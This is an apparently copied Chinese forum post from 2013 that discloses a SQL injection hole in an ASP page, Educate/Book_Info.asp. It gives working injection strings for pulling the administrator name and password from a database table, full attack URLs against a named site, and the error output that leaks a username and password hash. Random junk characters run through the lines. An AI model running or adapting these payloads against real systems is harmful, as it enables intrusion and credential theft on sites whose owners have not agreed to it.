漏洞出现在Educate/Book_Info.asp
6 Q8 h; j8 j0 A6 v) ~# w此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出4 H) X4 {' V) K ?$ s1 _/ F! p
exp:如下, M6 f! |4 F1 |
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper), b8 Z& r# `) d2 N |
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
7 ~ _% a% x8 \% Chttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
- J+ _/ x. x0 o4 p7 [) t' @Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
8 d7 A. c4 j# D, c. K将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
9 `* @: g9 ?% X; M/Educate/Book_Info.asp,行 8- D7 i2 T3 e" ]2 e# E% o. S
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 J# G' b+ G7 [5 I0 ^( |3 \$ r( m8 PMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
+ x5 j, L6 G$ F5 V! x' b将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。0 F! n7 I1 q$ ?$ }9 s7 ~, F6 p
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对